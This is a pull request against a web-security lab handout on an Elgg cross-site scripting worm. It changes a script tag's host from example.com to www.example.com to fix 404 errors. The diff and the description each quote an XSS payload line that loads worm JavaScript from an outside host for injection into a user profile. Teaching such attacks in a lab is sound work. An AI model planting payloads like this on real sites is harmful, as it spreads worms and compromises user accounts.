### PR TITLE
fix: add www in front of domain to fix 404 errors

### DIFF
--- a/category-web/Web_XSS_Elgg/Web_XSS_Elgg.tex
+++ b/category-web/Web_XSS_Elgg/Web_XSS_Elgg.tex
@@ -438,7 +438,7 @@ is given below. The worm can simply copy the following
 infecting the profile with the same worm.
 
 \begin{lstlisting}
-<script type="text/javascript" src="http://example.com/xss_worm.js">
+<script type="text/javascript" src="http://www.example.com/xss_worm.js">
 </script>
 \end{lstlisting} 
 


### PR DESCRIPTION
In Task 1, it uses the following which was different from the example provided in Task 6. The Task 6 sample resulted in 404 errors.

```html
<script type="text/javascript" 
        src="http://www.example.com/myscripts.js">
</script>
```